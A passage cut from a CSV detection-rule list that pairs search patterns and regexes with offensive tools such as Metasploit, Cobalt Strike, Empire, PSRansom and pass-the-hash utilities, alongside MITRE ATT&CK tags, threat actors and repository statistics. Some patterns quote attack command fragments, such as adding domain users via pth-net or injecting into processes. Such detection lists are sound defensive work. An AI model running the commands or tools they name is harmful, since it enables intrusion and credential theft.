protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*psexec_ms17_010.rb*",".{0,1000}psexec_ms17_010\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PSEXEC_PSH *",".{0,1000}PSEXEC_PSH\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","0","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*-PsExecCmd*",".{0,1000}\-PsExecCmd.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PsExecLiveImplant*",".{0,1000}PsExecLiveImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*PsExecMenu(*",".{0,1000}PsExecMenu\(.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*psinject * x64 Invoke-*",".{0,1000}psinject\s.{0,1000}\sx64\sInvoke\-.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*psinject -PID*",".{0,1000}psinject\s\-PID.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*PSLessExec.exe *",".{0,1000}PSLessExec\.exe\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*pslo *.ps1*",".{0,1000}pslo\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*PsMapExec -*",".{0,1000}PsMapExec\s\-.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PsMapExec will continue in the current users context*",".{0,1000}PsMapExec\swill\scontinue\sin\sthe\scurrent\susers\scontext.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PsMapExec.ps1*",".{0,1000}PsMapExec\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*PsMapExec-main*",".{0,1000}PsMapExec\-main.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","1","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*pSNIRFgTuZnCdHN*",".{0,1000}pSNIRFgTuZnCdHN.{0,1000}","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","0","N/A","10","10","1177","244","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z" "*PSObfucate.py*",".{0,1000}PSObfucate\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*Pspersist-main*",".{0,1000}Pspersist\-main.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","1","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*PSprofile.cpp*",".{0,1000}PSprofile\.cpp.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","N/A","10","1","83","21","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z" "*pspy - version: *",".{0,1000}pspy\s\-\sversion\:\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy*psscanner",".{0,1000}pspy.{0,1000}psscanner","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy32 -*",".{0,1000}pspy32\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy64 -*",".{0,1000}pspy64\s\-.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy64 -p*",".{0,1000}pspy64\s\-p.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy64 -r *",".{0,1000}pspy64\s\-r\s.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-build:latest*",".{0,1000}pspy\-build\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-development:latest*",".{0,1000}pspy\-development\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-example:latest*",".{0,1000}pspy\-example\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-master*",".{0,1000}pspy\-master.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","1","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*pspy-testing:latest*",".{0,1000}pspy\-testing\:latest.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1514 - T1082","TA0007 - TA0009 - TA0003","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","6","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*PSRansom by @JoelGMSec*",".{0,1000}PSRansom\sby\s\@JoelGMSec.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*PSRansom.ps1*",".{0,1000}PSRansom\.ps1.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*PSRecon*",".{0,1000}PSRecon.{0,1000}","offensive_tool_keyword","PSRecon","PSRecon gathers data from a remote Windows host using PowerShell (v2 or later). organizes the data into folders. hashes all extracted data. hashes PowerShell and various system properties. and sends the data off to the security team. The data can be pushed to a share. sent over email. or retained locally.","T1059 - T1003 - T1556 - T1204","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/gfoss/PSRecon","1","1","N/A","N/A","5","472","107","2017-07-29T15:03:04Z","2015-08-03T05:43:38Z" "*psreflect *",".{0,1000}psreflect\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*PSRunspace-InvokeRun-certutilCoded.txt*",".{0,1000}PSRunspace\-InvokeRun\-certutilCoded\.txt.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*pstgdump.exe*",".{0,1000}pstgdump\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PstPassword.exe*",".{0,1000}PstPassword\.exe.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*pstpassword.zip*",".{0,1000}pstpassword\.zip.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*pstpassword_setup.exe*",".{0,1000}pstpassword_setup\.exe.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*pstree.ps1*",".{0,1000}pstree\.ps1.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*PtC.exe challenge*",".{0,1000}PtC\.exe\schallenge.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe compare*",".{0,1000}PtC\.exe\scompare.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe inject*",".{0,1000}PtC\.exe\sinject.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe nthash *",".{0,1000}PtC\.exe\snthash\s.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe ping*",".{0,1000}PtC\.exe\sping.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe protect*",".{0,1000}PtC\.exe\sprotect.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*pth-net rpc group members *Domain admins*",".{0,1000}pth\-net\srpc\sgroup\smembers\s.{0,1000}Domain\sadmins.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pth-net rpc group members *Exchange Servers*",".{0,1000}pth\-net\srpc\sgroup\smembers\s.{0,1000}Exchange\sServers.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pth-net rpc password * -U * -S *",".{0,1000}pth\-net\srpc\spassword\s.{0,1000}\s\-U\s.{0,1000}\s\-S\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pth-net rpc user add * -U *-S *",".{0,1000}pth\-net\srpc\suser\sadd\s.{0,1000}\s\-U\s.{0,1000}\-S\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pth-rpcclient*",".{0,1000}pth\-rpcclient.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*pth-smbclient*",".{0,1000}pth\-smbclient.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*PTHSMBClientDelete*",".{0,1000}PTHSMBClientDelete.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*PTHSMBClientGet*",".{0,1000}PTHSMBClientGet.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*PTHSMBClientList*",".{0,1000}PTHSMBClientList.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*PTHSMBClientPut*",".{0,1000}PTHSMBClientPut.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*PTHSMBExec*",".{0,1000}PTHSMBExec.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*pth-smbget*",".{0,1000}pth\-smbget.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*pth-toolkit*",".{0,1000}pth\-toolkit.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*pth-winexe*",".{0,1000}pth\-winexe.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work 